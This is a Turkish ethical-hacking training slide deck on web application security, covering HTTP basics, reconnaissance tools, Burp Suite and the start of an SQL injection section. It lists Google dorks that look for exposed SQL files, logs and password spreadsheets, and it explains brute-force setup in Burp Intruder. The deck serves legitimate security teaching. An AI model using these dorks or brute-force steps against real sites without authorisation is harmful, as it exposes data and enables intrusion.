Beyaz Şapkalı Hacker CEH Eğitimi - Web Uygulama Güvenliği

www.prismacsi.com
© All Rights Reserved.
1
www.prismacsi.com
1
www.prismacsi.com
1
www.prismacsi.com
1
Uygulamalı Beyaz Şapkalı Hacker Eğitimi #9
Web Uygulama Güvenliği
Bu doküman, alıntı vererek kullanılabilir ya da paylaşılabilir ancak değiştirilemez ve ticari amaçla kullanılamaz. Detaylı bilgiye
https://creativecommons.org/licenses/by-nc-nd/4.0/legalcode.tr bağlantısından erişebilirsiniz.

www.prismacsi.com
2
www.prismacsi.com
2
www.prismacsi.com
2
www.prismacsi.com
2
Başlıklar
• Web Teknolojileri
• Mimari
• HTML
• HTML Encoding
• URL
• URL Encoding
• HTTP Temelleri
• HTTP Protokolü
• HTTP Durum Kodları
• Cookie
• Session
• Bilgi Toplama

www.prismacsi.com
3
www.prismacsi.com
3
www.prismacsi.com
3
www.prismacsi.com
3
Başlıklar
• Burp Suite
• Zafiyetler
• SQL Injection
• Cross Site Scripting
• Insecure Direct Object References (IDOR)
• Cross Site Request Forgery (CSRF)
• File Upload
• File Inclusion
• Command Injection
• Uygulama Sunucu Zafiyetleri
• DoS Zafiyetleri

www.prismacsi.com
4
www.prismacsi.com
4
www.prismacsi.com
4
www.prismacsi.com
4
Başlıklar
• OWASP TOP 10
• Otomatize Zafiyet Keşfi
• Netsparker
• Acunetix
• Burpsuite
• Arachni
• Nessus
• Nikto
• Kullanışlı Firefox Eklentileri

www.prismacsi.com
5
www.prismacsi.com
5
www.prismacsi.com
5
www.prismacsi.com
5
Web Teknolojileri

www.prismacsi.com
6
www.prismacsi.com
6
www.prismacsi.com
6
www.prismacsi.com
6
Web Teknolojileri – Mimari
• Çoğu Web Uygulaması 3 temel bileşene dayanmaktadır:
• İstemci: Büyük oranda web tarayıcı.
• Sunucu: İstemciden gelen istekleri karşılayan bir sunucu.
• Veritabanı: Verilerin alınıp kaydedildiği ve çağırıldığı veritabanı.
İstemci Sunucu Veritabanı

www.prismacsi.com
7
www.prismacsi.com
7
www.prismacsi.com
7
www.prismacsi.com
7
• İstemci taraflı teknolojiler:
• İstemci taraflı teknolojiler internet kullanıcıları tarafından günlük olarak kullanılan
teknolojilerdir. Firefox, Chrome, Opera, Safari gibi tarayıcılar ile birlikte kullanılan
HTML, Javascript, Flash bunlara örnek olarak verilebilir.
İstemci

www.prismacsi.com
8
www.prismacsi.com
8
www.prismacsi.com
8
www.prismacsi.com
8
• Sunucu taraflı teknolojiler:
• İstemcilere bilgi sunan ve istemciden gelen verilerin işlenmesini sağlayan teknolojilerdir.
• Çok fazla ve farklı teknolojiler burada bulunur. Bundan dolayı bu kısımda zafiyet
bulunma olasılığı yüksektir.
• Başlıca sunucu taraflı teknolojiler:
• Apache, Nginx, IIS gibi web sunucuları
• Tomcat, JBoss, Oracle Application Server gibi uygulama sunucuları
• C#, PHP, Java, Python, Ruby, ASP başlıca kullanılan dillerdir.
Sunucu

www.prismacsi.com
9
www.prismacsi.com
9
www.prismacsi.com
9
www.prismacsi.com
9
• Veritabanı:
• Veritabanları uygulama sunucularıyla aynı sunucu üzerinde bulunacağı gibi güvenlik
sebebiyle başka sunucular üzerinde de bulunabilir.
• Başlıca veritabanı teknolojileri:
• İlişkisel: MySQL, Microsoft SQL Server, Oracle, PostgreSQL
• NoSQL: MongoDB, CouchDB
Veritabanı

www.prismacsi.com
10
www.prismacsi.com
10
www.prismacsi.com
10
www.prismacsi.com
10
Client Side Server Side DBMS

www.prismacsi.com
11
www.prismacsi.com
11
www.prismacsi.com
11
www.prismacsi.com
11
Web Teknolojileri – HTML
• HTML (Hyper Text Markup Language) internet üzerinde web sayfası oluşturmak için
kullanılan bir betik dilidir.
• HTML dosyaları sunucu bilgisayarın sabit diskinde .html ya da .htm uzantısı ile saklanır.
• Yazılan HTML dosyaları düz yazı formatındadır.
• HTML kodları tarayıcılar aracılığıyla okunup, yorumlanır ve görsel olarak sunulur.
• HTML dosyalarının aktarımı için HTTP (Hyper Text Transfer Protocol) kullanılır.

www.prismacsi.com
12
www.prismacsi.com
12
www.prismacsi.com
12
www.prismacsi.com
12
<!DOCTYPE html>
<html>
<head>
<title> Prisma CSI </title>
</head>
<body>
<h1> Başlık </h1>
<p> Paragraf </p>
<img src="https://www.prismacsi.com/logo.png">
</body>
</html>

www.prismacsi.com
13
www.prismacsi.com
13
www.prismacsi.com
13
www.prismacsi.com
13
• Temel HTML Elementleri:
• head
• title
• body
• script
• style
• table
• a
• img
• iframe
• <! - - yorum satırı - - >

www.prismacsi.com
14
www.prismacsi.com
14
www.prismacsi.com
14
www.prismacsi.com
14
<a> (anchor)
• Linkleme işlemi için kullanılır.
<a href="www.prismacsi.com"> PRISMA CSI </a>

www.prismacsi.com
15
www.prismacsi.com
15
www.prismacsi.com
15
www.prismacsi.com
15
<img>
• Sayfaya resim eklemek için kullanılır.
• Soru: Nasıl kötüye kullanılır?
<img src="https://www.prismacsi.com/logo.png" height="200">

www.prismacsi.com
16
www.prismacsi.com
16
www.prismacsi.com
16
www.prismacsi.com
16
<iframe>
• HTML sayfa içerisinde başka bir siteyi çağırmak için kullanılır.

www.prismacsi.com
17
www.prismacsi.com
17
www.prismacsi.com
17
www.prismacsi.com
17
<!- - - ->
• Tarayıcılar tarafından işletilmeyen, yazılımcıların genellikle kendilerine hatırlatma amacıyla
koyduğu yorum satırlarıdır.

www.prismacsi.com
18
www.prismacsi.com
18
www.prismacsi.com
18
www.prismacsi.com
18
Web Teknolojileri – HTML Encoding
• HTML Encoding
' ' apostrophe
" " quotation
< < less-than
> > greater-than
& & Ampersand

www.prismacsi.com
19
www.prismacsi.com
19
www.prismacsi.com
19
www.prismacsi.com
19
Web Teknolojileri – HTML Encoding
• HTML Encoding

www.prismacsi.com
20
www.prismacsi.com
20
www.prismacsi.com
20
www.prismacsi.com
20
Web Teknolojileri – URL
• URL (Uniform Resource Locator)
• Web uygulamalarına erişim için adresleme standardı
• Rezerve Karakterler: ! * ’ ( ) ; , : @ & = + $ / ? % # [ ]
• protokol://host:port/doküman_yolu?parametre=değer#fragment
protokol http, https, ftp
host:port prismacsi.com:80
doküman_yolu /, /index.html, /egitimler/index.html
?parametre=değer ?egitim=hackercamp
#fragment #linux

www.prismacsi.com
21
www.prismacsi.com
21
www.prismacsi.com
21
www.prismacsi.com
21
Web Teknolojileri – URL Encoding
• https://www.w3schools.com/tags/ref_urlencode.asp
' %27
" %22
< %3C
> &3E
/ %2F
( %28
) %29
: &3A
; &3B
A %41

www.prismacsi.com
22
www.prismacsi.com
22
www.prismacsi.com
22
www.prismacsi.com
22
Web Teknolojileri – URL Encoding
• https%3A%2F%2Fwww.prismacsi.com%2F%3Fsearch%3Dtest%27mesaj%22%3B%23
• https://www.prismacsi.com/?search=test'mesaj";#
: / / / ? = " ;' #

www.prismacsi.com
23
www.prismacsi.com
23
www.prismacsi.com
23
www.prismacsi.com
23
HTTP Temelleri

www.prismacsi.com
24
www.prismacsi.com
24
www.prismacsi.com
24
www.prismacsi.com
24
HTTP Temelleri
• HTTP protokolü genel olarak web tarayıcılarının kullandığı bir protokoldür.
• Kullanıcı ve Web Uygulaması arasındaki trafik genellikle HTTP protokolü üzerinden gerçekleşir.
• Default olarak TCP 80 portunda çalışır.
• Plaintext’dir.
• İstek ve cevap şeklinde çalışır.
• Bu kullanıcı şuan sistemde mi? Yetkili mi? Gibi durum kontrolü yapmaz.
• Durum kontrolü yapmadığı için Cookie ve Session mekanizmaları kullanılır.
• Cevaplarda durum kodları bulunur.

www.prismacsi.com
25
www.prismacsi.com
25
www.prismacsi.com
25
www.prismacsi.com
25
HTTP Temelleri
• Header ve Body olarak iki ana bölümden oluşur:
HEADERSrn
rn
MESSAGE BODYrn
POST /sayfa.php HTTP/1.1
User-Agent: Mozilla/4.0
Host: facebook.com
Content-Length=15
isim=Hakan
HEADER
MESSAGE BODY

www.prismacsi.com
26
www.prismacsi.com
26
www.prismacsi.com
26
www.prismacsi.com
26
HTTP Temelleri
• Örnek: Google.com’a gitmek için nasıl bir istekte bulunuyoruz?
GET / HTTP/1.1
Host: google.com.tr
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0)
Gecko/20100101 Firefox/57.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Cookie: NID=111=…
Connection: close

www.prismacsi.com
27
www.prismacsi.com
27
www.prismacsi.com
27
www.prismacsi.com
27
HTTP Temelleri
• Request metodumuzdur.
• Sunucudan ne tarz bir istekte bulunduğumuzu belirtiriz.
GET /sayfa.php?isim=Hakan HTTP/1.1
Host: facebook.com
• GET dışında POST, PUT, DELETE, OPTIONS gibi farklı metodlarda mevcuttur.

www.prismacsi.com
28
www.prismacsi.com
28
www.prismacsi.com
28
www.prismacsi.com
28
HTTP Temelleri
• PATH belirtir.
• Hangi dizine istek yapılıyorsa o yazılır.
• Örneğin Google.com/translate/index.php için yapılacak olan GET isteği:
GET /translate/index.php HTTP/1.1
Şeklinde olacaktır.
• Ana dizin her zaman / ile belirtilir.

www.prismacsi.com
29
www.prismacsi.com
29
www.prismacsi.com
29
www.prismacsi.com
29
HTTP Temelleri
• Protokol bilgisini belirtir.
• Güncel olarak HTTP 1.1 protokolü kullanılmaktadır.

www.prismacsi.com
30
www.prismacsi.com
30
www.prismacsi.com
30
www.prismacsi.com
30
POST
• GET ile aynı işlemi yapar fakat POST ile daha fazla veri gönderilebilir, veriler arka planda HTTP
isteğinin body kısmında gönderilir, URL'de bu değerler gözükmez
• Örneğin File Upload işlemleri POST metodunu kullanırlar
POST /sayfa.php HTTP/1.1
Host: facebook.com
Content-Length=15
...
isim=Hakan

www.prismacsi.com
31
www.prismacsi.com
31
www.prismacsi.com
31
www.prismacsi.com
31
HTTP Temelleri
Host: google.com.tr
• Bir IP adresi üzeride birden fazla web sitesi barınıyor olabilir.
• Host başlık bilgisi sunucu üzerinde hangi siteye istek yapıldığını belirtir.
• HTTP Başlıkları
• Başlık_İsmi:Başlık Değeri şeklinde yazılır.

www.prismacsi.com
32
www.prismacsi.com
32
www.prismacsi.com
32
www.prismacsi.com
32
HTTP Temelleri
• Durum Kodları
• 1xx : Bilgi
• 2xx : Başarılı
• 200 OK
• 3xx : Yönlendirme
• 4xx : Sunucu taraflı bir hata
• 401 Unauthorized
• 403 Forbidden
• 404 Not found
• 5xx : Server taraflı bir hata

www.prismacsi.com
33
www.prismacsi.com
33
www.prismacsi.com
33
www.prismacsi.com
33
HTTP Temelleri
• Cookie
• Oturum bilgileri browser tarafından saklanır ve oturumu tanımlayan değerlerdir.
• Kullanıcının bilgilerini barındırır.
• Cookie HTTP başlığı ile alınır ve yollanır.
• Cookie sunucu tarafından tanımlanır.

www.prismacsi.com
34
www.prismacsi.com
34
www.prismacsi.com
34
www.prismacsi.com
34
HTTP Temelleri
• Cookie
• Cookieler Set-Cookie başlığı ile atanır.
• Set-Cookie: CookieName=CookieValue; expires=tarih; domain=alan adı; path=path; secure;
• Domain: Cookie ayarlandıktan sonra hangi domain’e istek yapıldığında bu cookie’nin ekleneceğini
belirten değerdir.
• Path: Cookie’nin hangi path’e istek yapıldığında ekleneceğini belirten değerdir.
• Expires: Cookie’nin ne zaman geçersiz olacağını belirten değerdir. Belirtilmediği takdirde browser
kapandıktan sonra Cookie silinir.
• Secure: Cookie’nin yalnızca HTTPS bağlantılarda gönderilmesini gerektiğini belirten değerdir.
• HttpOnly: Cookie’nin yalnızca HTTP istekleri sırasında kullanılacağını belirtir. Javascript gibi çağrılara
eklenmez.

www.prismacsi.com
35
www.prismacsi.com
35
www.prismacsi.com
35
www.prismacsi.com
35
HTTP Temelleri
• Session
• Oturum bilgileri sunucu tarafında farklı noktalarda saklanabilir:
• Veritabanında
• Dosya üzerinde
• İstemci tarafında Session ID saklanır
• Session ID'ye sahip herkes bu hesaplara erişim sağlayabilir

www.prismacsi.com
36
www.prismacsi.com
36
www.prismacsi.com
36
www.prismacsi.com
36
Bilgi Toplama

www.prismacsi.com
37
www.prismacsi.com
37
www.prismacsi.com
37
www.prismacsi.com
37
IP Aralığı Tespiti - Uygulama
ripe.net

www.prismacsi.com
38
www.prismacsi.com
38
www.prismacsi.com
38
www.prismacsi.com
38
Whois Analizi - Uygulama
who.is

www.prismacsi.com
39
www.prismacsi.com
39
www.prismacsi.com
39
www.prismacsi.com
39
Reverse Whois Analizi - Uygulama
whoisology.com

www.prismacsi.com
40
www.prismacsi.com
40
www.prismacsi.com
40
www.prismacsi.com
40
Subdomain, Virtualhost ve Email Keşfi - Uygulama
theharvester

www.prismacsi.com
41
www.prismacsi.com
41
www.prismacsi.com
41
www.prismacsi.com
41
Aquatone-Discover - Uygulama
aquatone-discover –d yandex.com

www.prismacsi.com
42
www.prismacsi.com
42
www.prismacsi.com
42
www.prismacsi.com
42
Sublist3r - Uygulama
https://github.com/aboul3la/Sublist3r

www.prismacsi.com
43
www.prismacsi.com
43
www.prismacsi.com
43
www.prismacsi.com
43
DNS Bilgileri - Uygulama
robtex.com

www.prismacsi.com
44
www.prismacsi.com
44
www.prismacsi.com
44
www.prismacsi.com
44
dnsdumpster.com

www.prismacsi.com
45
www.prismacsi.com
45
www.prismacsi.com
45
www.prismacsi.com
45
mxtoolbox.com

www.prismacsi.com
46
www.prismacsi.com
46
www.prismacsi.com
46
www.prismacsi.com
46
dnsstuff.com

www.prismacsi.com
47
www.prismacsi.com
47
www.prismacsi.com
47
www.prismacsi.com
47
dig

www.prismacsi.com
48
www.prismacsi.com
48
www.prismacsi.com
48
www.prismacsi.com
48
dig

www.prismacsi.com
49
www.prismacsi.com
49
www.prismacsi.com
49
www.prismacsi.com
49
Fierce DNS Keşif - Uygulama

www.prismacsi.com
50
www.prismacsi.com
50
www.prismacsi.com
50
www.prismacsi.com
50
Yougetsignal - Uygulama
yougetsignal.com

www.prismacsi.com
51
www.prismacsi.com
51
www.prismacsi.com
51
www.prismacsi.com
51
Bing - Uygulama
bing.com

www.prismacsi.com
52
www.prismacsi.com
52
www.prismacsi.com
52
www.prismacsi.com
52
Netcraft - Uygulama
netcraft.com

www.prismacsi.com
53
www.prismacsi.com
53
www.prismacsi.com
53
www.prismacsi.com
53
Wayback Machine - Uygulama
Archive.org

www.prismacsi.com
54
www.prismacsi.com
54
www.prismacsi.com
54
www.prismacsi.com
54
Wayback Machine - Uygulama
archive.org

www.prismacsi.com
55
www.prismacsi.com
55
www.prismacsi.com
55
www.prismacsi.com
55
Shodan - Uygulama
shodan.io

www.prismacsi.com
56
www.prismacsi.com
56
www.prismacsi.com
56
www.prismacsi.com
56
Censys - Uygulama
censys.io

www.prismacsi.com
57
www.prismacsi.com
57
www.prismacsi.com
57
www.prismacsi.com
57
Haveibeenpwned - Uygulama
haveibeenpwned.com

www.prismacsi.com
58
www.prismacsi.com
58
www.prismacsi.com
58
www.prismacsi.com
58
Serversniff - Uygulama
• Online Araştırma Kaynakları – Serversniff.net

www.prismacsi.com
59
www.prismacsi.com
59
www.prismacsi.com
59
www.prismacsi.com
59
Hackertarget - Uygulama
• Online Araştırma Kaynakları – Hackertarget.com

www.prismacsi.com
60
www.prismacsi.com
60
www.prismacsi.com
60
www.prismacsi.com
60
Alexa - Uygulama
alexa.com

www.prismacsi.com
61
www.prismacsi.com
61
www.prismacsi.com
61
www.prismacsi.com
61
Pastebin- Uygulama
pastebin.com

www.prismacsi.com
62
www.prismacsi.com
62
www.prismacsi.com
62
www.prismacsi.com
62
Pastebin Search - Uygulama
https://inteltechniques.com/OSINT/pastebins.html

www.prismacsi.com
63
www.prismacsi.com
63
www.prismacsi.com
63
www.prismacsi.com
63
Stackoverflow - Uygulama
stackoverflow.com

www.prismacsi.com
64
www.prismacsi.com
64
www.prismacsi.com
64
www.prismacsi.com
64
Github - Uygulama
github.com

www.prismacsi.com
65
www.prismacsi.com
65
www.prismacsi.com
65
www.prismacsi.com
65
Google Hacking DB
• Google Hacking DB
• Dork kavramı
• Sık kullanılan parametreler
• Site , -site, Inurl, intitle, intext
• Filetype: , ext : , cache:

www.prismacsi.com
66
www.prismacsi.com
66
www.prismacsi.com
66
www.prismacsi.com
66
Google Hacking DB
• Örnek Dorklar
• Intitle:index.of url:domain.com
• Intitle:index.of inurl:domain.com filetype:sql
• Site:domain.com –site:www.domain.com unique
• Filetype:log intext:”putty”
• Filetype:xls “username | password”
• Ext:phps “mysql_connect”
• inurl:/view/index/shtml

www.prismacsi.com
67
www.prismacsi.com
67
www.prismacsi.com
67
www.prismacsi.com
67
Google Hacking DB - Uygulama
• https://www.exploit-db.com/google-hacking-database/

www.prismacsi.com
68
www.prismacsi.com
68
www.prismacsi.com
68
www.prismacsi.com
68
Google Hacking DB - Uygulama
• Google Images

www.prismacsi.com
69
www.prismacsi.com
69
www.prismacsi.com
69
www.prismacsi.com
69
Ek Araçların Listesi
Bu araçlar ile manuel olarak ele alınan süreçlerin büyük bölümü için otomatize analiz yapılabilir.
• Spiderfoot
• Recon-ng
• Foca
• Metagoofil
• Maltego

www.prismacsi.com
70
www.prismacsi.com
70
www.prismacsi.com
70
www.prismacsi.com
70
Burp Suite

www.prismacsi.com
71
www.prismacsi.com
71
www.prismacsi.com
71
www.prismacsi.com
71
Burp Suite Nedir?
• Burp Suite Web Uygulama Güvenliği testlerinde yaygın olarak kullanılan HTTP Proxy araçlarından biridir.
• Ticari bir üründür.
• Kısıtlı imkanların bulunduğu ücretsiz sürümü de bulunmaktadır.
• https://portswigger.net/burp/communitydownload adresinden indirilebilir.

www.prismacsi.com
72
www.prismacsi.com
72
www.prismacsi.com
72
www.prismacsi.com
72
Burp Suite Konfigürasyonu
• Burp Suite standart olarak gelen ayarlarda 127.0.0.1:8080 adresini dinlemektedir.

www.prismacsi.com
73
www.prismacsi.com
73
www.prismacsi.com
73
www.prismacsi.com
73
• Tarayıcımızın Ayarlar - Gelişmiş - Bağlantı Ayarlarından 127.0.0.1:8080 yönlendirilir.

www.prismacsi.com
74
www.prismacsi.com
74
www.prismacsi.com
74
www.prismacsi.com
74
• Tarayıcıdan gelen trafiğin Burp üzerinde görüntülenmesi aşağıdaki gibidir

www.prismacsi.com
75
www.prismacsi.com
75
www.prismacsi.com
75
www.prismacsi.com
75
Burp Suite Sertifika Konfigürasyonu
• SSL Trafiğinin dinlenmesi için CA sertifikasının yüklenmesi gerekmektedir.

www.prismacsi.com
76
www.prismacsi.com
76
www.prismacsi.com
76
www.prismacsi.com
76
• Burp Suite açtıktan sonra tarayıdan http://burp adresine giderek CA CERTIFICATE butonuna tıklayıp sertifika
indirilir.

www.prismacsi.com
77
www.prismacsi.com
77
www.prismacsi.com
77
www.prismacsi.com
77
• Tercihler-Gelişmiş-Sertifikalar-Sertifikaları Göster-İçe Aktar` a tıklayıp indirdiğimiz sertifikayı tarayıcımıza
ekleyebiliriz.

www.prismacsi.com
78
www.prismacsi.com
78
www.prismacsi.com
78
www.prismacsi.com
78
Burp Suite Kullanımı
• Proxy sekmesi altında Intercept sekmesinde Forward butonu yardımı ile istek adrese iletilir.

www.prismacsi.com
79
www.prismacsi.com
79
www.prismacsi.com
79
www.prismacsi.com
79
• Proxy sekmesi altında Intercept sekmesinde Drop butonu ile istek sonlandırılabilir.

www.prismacsi.com
80
www.prismacsi.com
80
www.prismacsi.com
80
www.prismacsi.com
80
• Proxy sekmesi altında HTTP History sekmesinde yaptığımız istekleri görüntüleyebiliriz.

www.prismacsi.com
81
www.prismacsi.com
81
www.prismacsi.com
81
www.prismacsi.com
81
Burp Suite Site Map Kullanımı
• Target sekmesinde Site Map butonu yardımı ile hedef sitenin site haritasını görüntüleyebilirsiniz.

www.prismacsi.com
82
www.prismacsi.com
82
www.prismacsi.com
82
www.prismacsi.com
82
Burp Suite Scope Kullanımı
• Target -> Site Map sekmesinde URL lerden birine sağ tıkla Add to Scope seçeneğiyle listelemek istenilen adresler
Scope Sekmesine eklenir.

www.prismacsi.com
83
www.prismacsi.com
83
www.prismacsi.com
83
www.prismacsi.com
83
Burp Suite Scope Kullanımı
• Target sekmesinde Scope sekmesinde eklediğimiz URL’leri listeleyebiliriz

www.prismacsi.com
84
www.prismacsi.com
84
www.prismacsi.com
84
www.prismacsi.com
84
Burp Suite Spider Kullanımı
• Spider fonksiyonu Scope’a eklediğiniz siteleri dolaşarak sitedeki urlleri listelemektedir.

www.prismacsi.com
85
www.prismacsi.com
85
www.prismacsi.com
85
www.prismacsi.com
85
Burp Suite Spider Kullanımı
• Spider -> Options sekmesine geçip özelleştirebilecek ayarlar görüntülenir.

www.prismacsi.com
86
www.prismacsi.com
86
www.prismacsi.com
86
www.prismacsi.com
86
Burp Suite Spider - Crawler Ayarları
• Check robots.txt: robots.txt dosyasını kontrol etme durumu belirlenir.

www.prismacsi.com
87
www.prismacsi.com
87
www.prismacsi.com
87
www.prismacsi.com
87
• Detect custom "not found" responses: 404 sayfası keşfinin aktifleştirilmesi.

www.prismacsi.com
88
www.prismacsi.com
88
www.prismacsi.com
88
www.prismacsi.com
88
• Request the root of all directories: Site içerisinde tüm dizinlerin indexlenmesi için seçilir.

www.prismacsi.com
89
www.prismacsi.com
89
www.prismacsi.com
89
www.prismacsi.com
89
Burp Suite Spider - Passive Spidering
• Passively spider as you browse: Burp Suite üzerinden geçen tüm istekleri ve yanıtları takip eder.

www.prismacsi.com
90
www.prismacsi.com
90
www.prismacsi.com
90
www.prismacsi.com
90
Burp Suite Spider - Form Submission
• Individuate forms: Burp Suite yeni bir formla karşılaştığında diğer sekmesine eklenmesi için kullanılır.

www.prismacsi.com
91
www.prismacsi.com
91
www.prismacsi.com
91
www.prismacsi.com
91
• Prompt for guidance: Burp Suite her formla karşılaştığında formun nasıl submit edileceğini kullanıcıya sorar.

www.prismacsi.com
92
www.prismacsi.com
92
www.prismacsi.com
92
www.prismacsi.com
92
• Automatically submit: Burp Suite her formla karşılaştığında formun otamatik doldurup submit eder.

www.prismacsi.com
93
www.prismacsi.com
93
www.prismacsi.com
93
www.prismacsi.com
93
Burp Suite Spider - Application Login
• Handle as ordinary forms: Burp Suite login formlarında nasıl konfigürasyon yapıldıysak ona göre aksiyon
alınmasını sağlar

www.prismacsi.com
94
www.prismacsi.com
94
www.prismacsi.com
94
www.prismacsi.com
94
Burp Suite Spider - Application Login
• Automatically submit these credentials: Kullanıcı ad Şifre bilgilerini otomatik olarak doldurup submit eder.

www.prismacsi.com
95
www.prismacsi.com
95
www.prismacsi.com
95
www.prismacsi.com
95
Burp Suite Spider - Spider Engine
• Spider için ayarlamaların yapıldığı kısımdır. Threat, hata sonrası deneme sayısı gibi ayarlar yapılabilir.

www.prismacsi.com
96
www.prismacsi.com
96
www.prismacsi.com
96
www.prismacsi.com
96
Burp Suite Spider - Requests Headers
• Yapılacak olan isteklerde Header bilgilerinin belirlendiği kısımdır.

www.prismacsi.com
97
www.prismacsi.com
97
www.prismacsi.com
97
www.prismacsi.com
97
Burp Suite Spider Kullanımı - Requests Headers
• Controls sekmesinde işlemi başlatabilirsiniz.

www.prismacsi.com
98
www.prismacsi.com
98
www.prismacsi.com
98
www.prismacsi.com
98
Burp Suite Intruder Kullanımı
• Intruder otomatize olarak zafiyet taraması yapıp exploit edilmesi için kullanılır.
• SQLi, XSS vb popüler zafiyetler bulunabilir.
• Brute Force atak yapılabilir.
• Yanlış konfigürasyon yüzünden hassas verilere erişilebilir.

www.prismacsi.com
99
www.prismacsi.com
99
www.prismacsi.com
99
www.prismacsi.com
99
• HTTP History sekmesinde önceden yaptığımız isteklerden sağ tıkla Send to Intruder seçeneğiyle intruder yollanır.

www.prismacsi.com
10
0
www.prismacsi.com
10
0
www.prismacsi.com
10
0
www.prismacsi.com
10
0
• Burp Suite bizim için değişkenleri taralı hale getirir. Sağ sütundaki butonlar yardımıyla ekleme, silme, otomatik
belirleme yapılabilir.

www.prismacsi.com
10
1
www.prismacsi.com
10
1
www.prismacsi.com
10
1
www.prismacsi.com
10
1
• Örnek olarak bir kaba kuvvet saldırısı için değişkenlerdeki password kısmı seçilerek Payloads sekmesinden
seçilen wordlist ile atak başlatılabilir.

www.prismacsi.com
10
2
www.prismacsi.com
10
2
www.prismacsi.com
10
2
www.prismacsi.com
10
2
Burp Suite Intruder Kullanımı - Saldırı Tipleri
• Sniper: Örnektede bahsettiğimiz gibi tek bir parametreyi hedef alan saldırılarda kullanılır.

www.prismacsi.com
10
3
www.prismacsi.com
10
3
www.prismacsi.com
10
3
www.prismacsi.com
10
3
• Batterin ram: Birden fazla parametreli saldırılarda kullanılır ancak tüm parametrelere aynı payload kullanılarak
deneme yapılır.

www.prismacsi.com
10
4
www.prismacsi.com
10
4
www.prismacsi.com
10
4
www.prismacsi.com
10
4
• Pitchfork: Tüm parametrelere farklı payload kullanılarak deneme yapılır. Çoklu listeden parametre sırasına göre
denemeler yapılır.

www.prismacsi.com
10
5
www.prismacsi.com
10
5
www.prismacsi.com
10
5
www.prismacsi.com
10
5
• Cluster Bomb: Tüm parametrelere farklı payload kullanılır. Listeden parametre sırasına göre çapraz denemeler
yapılır.

www.prismacsi.com
10
6
www.prismacsi.com
10
6
www.prismacsi.com
10
6
www.prismacsi.com
10
6
Burp Suite Repeater Kullanımı
• Repeater manuel olarak yapılan isteklerde değişiklik yapmamıza yardımcı olur.

www.prismacsi.com
10
7
www.prismacsi.com
10
7
www.prismacsi.com
10
7
www.prismacsi.com
10
7
• Proxy sekmesinde HTTP History sekmesine gidip hedef adreslerden birine sağ tıklayarak Send to Repeater
seçeneğiyle kullanılır.

www.prismacsi.com
10
8
www.prismacsi.com
10
8
www.prismacsi.com
10
8
www.prismacsi.com
10
8
• Repeater a yollanan istekler Repeater sekmesinden incelenir. İsteklerde değişiklikler yapıp geri dönüşler kolayca
görülebilir.

www.prismacsi.com
10
9
www.prismacsi.com
10
9
www.prismacsi.com
10
9
www.prismacsi.com
10
9
Burp Suite Sequencer Kullanımı
• Sequencer üretilen tokenlerin rasgelelik derecesini analiz etmeye yarar.

www.prismacsi.com
11
0
www.prismacsi.com
11
0
www.prismacsi.com
11
0
www.prismacsi.com
11
0
• Web uygulaması tarafından kullanıcıya oturum açıldıktan sonra üretilen ve kullanıcının her yaptığı istekte web
uygulamasına kendini tanıtmak amacıyla yolladığı bu keye Session key adı verilir. Sequencer’ın yapmaya çalıştığı
bu keylerin tahmin edilebilirliğini kontrol etmektir.

www.prismacsi.com
11
1
www.prismacsi.com
11
1
www.prismacsi.com
11
1
www.prismacsi.com
11
1
• Sequencer’a yollanan isteği Token Location Within Response kısmında PHPSESSID tutulduğunu görürüz

www.prismacsi.com
11
2
www.prismacsi.com
11
2
www.prismacsi.com
11
2
www.prismacsi.com
11
2
• PHPSESSID’ı seçip Start Live Capture a tıklayarak Burp Suite’in uygulamaya istekler yaparak PHPSESSID
toplamasını sağlıyoruz.

www.prismacsi.com
11
3
www.prismacsi.com
11
3
www.prismacsi.com
11
3
www.prismacsi.com
11
3
• PHPSESSID’ı seçip Start Live Capture a tıklayarak Burp Suite’in uygulamaya istekler yaparak PHPSESSID
toplamasını sağlıyoruz.

www.prismacsi.com
11
4
www.prismacsi.com
11
4
www.prismacsi.com
11
4
www.prismacsi.com
11
4
• Toplanan PHPSESSID’lerin sayısı ne kadar artarsa yapılacak analizin doğruluk oranı arttığı
unutulmamalıdır.

www.prismacsi.com
11
5
www.prismacsi.com
11
5
www.prismacsi.com
11
5
www.prismacsi.com
11
5
Burp Suite Comparer Kullanımı
• Comparer iki istek yada iki yanıt arasındaki farkı anlamamıza yardımcı olur.

www.prismacsi.com
11
6
www.prismacsi.com
11
6
www.prismacsi.com
11
6
www.prismacsi.com
11
6
• İsteği sağ tık menüsünden Comparer’e yönlendirilir.

www.prismacsi.com
11
7
www.prismacsi.com
11
7
www.prismacsi.com
11
7
www.prismacsi.com
11
7
• Karşılaştırılmasını istediğimiz 2 isteği seçerek sağ alttan Words veya Bytes türünden karşılaştırılır.

www.prismacsi.com
11
8
www.prismacsi.com
11
8
www.prismacsi.com
11
8
www.prismacsi.com
11
8
Burp Suite Eklentileri
• Burp Suite’e çeşitli eklentiler kurarak yeteneklerini arttırabiliriz.

www.prismacsi.com
11
9
www.prismacsi.com
11
9
www.prismacsi.com
11
9
www.prismacsi.com
11
9
Burp Suite Eklentileri
• Extender - BApp Store’dan istediğimiz eklentiyi seçip install butonu ile kurulumu gerçekleştiriyoruz.

www.prismacsi.com
12
0
www.prismacsi.com
12
0
www.prismacsi.com
12
0
www.prismacsi.com
12
0
Zafiyetler

www.prismacsi.com
12
1
www.prismacsi.com
12
1
www.prismacsi.com
12
1
www.prismacsi.com
12
1
SQL Injection

www.prismacsi.com
12
2
www.prismacsi.com
12
2
www.prismacsi.com
12
2
www.prismacsi.com
12
2
SQL Injection Zafiyeti Nedir?
• Saldırganların, uygulama girdi noktaları üzerinden, sistemin veritabanına müdahale edebilecek zafiyetleri
bölümleri tespit edip, buralardan veritabanı işlemleri yapmasıdır.

www.prismacsi.com
12
3
www.prismacsi.com
12
3
www.prismacsi.com
12
3
www.prismacsi.com
12
3
SQL Injection Zafiyetinin Sebebi Nedir?
• Uygulamalar belirli sorguları dinamik olarak gerçekleştirmektedir.
• Kullanıcıdan gelebilecek olan veriler güvenli kabul edilerek, herhangi bir işlemden geçmeden, direk olarak SQL
kodu içerisinde işletilmesi durumu bu zafiyeti ortaya çıkarmaktadır.

www.prismacsi.com
12
4
www.prismacsi.com
12
4
www.prismacsi.com
12
4
www.prismacsi.com
12
4
SQL Injection Zafiyetinin Zararları Nedir?
• Zafiyeti tespit eden saldırganlar veritabanı üzerinde;
• Veri silme
• Veri güncelleme
• Ver ekleme
İşlemleri gerçekleştirebilir.
